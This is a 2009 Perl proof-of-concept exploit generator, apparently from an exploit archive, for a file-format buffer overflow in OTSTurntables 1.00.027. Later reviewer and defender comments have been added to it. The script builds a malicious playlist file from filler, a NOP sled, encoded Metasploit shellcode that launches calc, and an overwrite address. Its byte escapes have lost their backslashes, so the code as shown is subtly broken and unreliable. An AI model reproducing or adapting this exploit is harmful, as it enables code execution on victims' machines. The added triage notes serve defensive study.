# Title : OTSTurntables 1.00.027 (.m3u/.ofl file) Universal BOF Exploit
# Published : 2009-04-08
# Author : AlpHaNiX
#!/usr/bin/perl
# By AlpHaNiX [NullArea.Net]
# alpha[at]hacker.bz
# Made in Tunisia
# Proof-of-concept generator: concatenates four strings and appends the result
# to file.ofl, the malformed playlist file for the OTSTurntables 1.00.027
# overflow named in the page title. Order in the file: filler, NOP run,
# payload, overwrite value.
#
# NOTE(review): every "xNN" below looks like a "\xNN" escape whose backslash was
# lost when this page was extracted; as shown, Perl treats them as literal text,
# not single bytes. The listing is kept exactly as the page gives it.
#
# Defender notes:
#  - Per the generator comment below, the payload only launches calc, i.e. it is
#    a demonstration that control of execution was gained.
#  - Playlist files are normally text, so a .ofl/.m3u file holding a long run of
#    one repeated character followed by non-printable data is a reasonable
#    triage signal for this class of file-format overflow.
#  - The hard-coded value in $ret only helps an attacker if that address is
#    stable on the target; ASLR breaks that assumption, and DEP stops a payload
#    placed in a data buffer from executing. Whether the affected build opts in
#    to either is not shown here - confirm.
#  - The page names no fixed release; until one is confirmed, do not open
#    untrusted playlist files with the affected version.
my $junk = "x41" x 96 ; # filler ahead of the payload (author: "whatever bytes")
my $nop = "x90" x 20 ; # presumably a run of 0x90 (x86 NOP) bytes - see note above
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub , thanks metasploit
# (author's generator settings: Metasploit-produced, encoded payload that runs calc)
my $shellcode =
"x29xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13xc9".
"x2cxc9x40x83xebxfcxe2xf4x35xc4x8dx40xc9x2cx42x05".
"xf5xa7xb5x45xb1x2dx26xcbx86x34x42x1fxe9x2dx22x09".
"x42x18x42x41x27x1dx09xd9x65xa8x09x34xcexedx03x4d".
"xc8xeex22xb4xf2x78xedx44xbcxc9x42x1fxedx2dx22x26".
"x42x20x82xcbx96x30xc8xabx42x30x42x41x22xa5x95x64".
"xcdxefxf8x80xadxa7x89x70x4cxecxb1x4cx42x6cxc5xcb".
"xb9x30x64xcbxa1x24x22x49x42xacx79x40xc9x2cx42x28".
"xf5x73xf8xb6xa9x7ax40xb8x4axecxb2x10xa1xdcx43x44".
"x96x44x51xbex43x22x9exbfx2ex4fxa8x2cxaax02xacx38".
"xacx2cxc9x40" ;
# Last field of the file. The author labels it as the address of a
# pop/pop/ret instruction sequence; which module it belongs to is not stated
# on this page.
my $ret = "x58xF6xE8x73"; # pop ebx pop ret
# Field order is fixed here; the offsets depend on the lengths declared above.
my $exploit = $junk.$nop.$shellcode.$ret;
# NOTE(review): two-argument open on a bareword handle, in append mode (">>")
# and with no error check: a failed open is silent, and re-running the script
# adds another copy of the data to an existing file.ofl.
open (file,">>file.ofl");
print file $exploit;
close (file);
# Presumably "done\n" before the backslash was lost; as shown it prints "donen".
print "donen";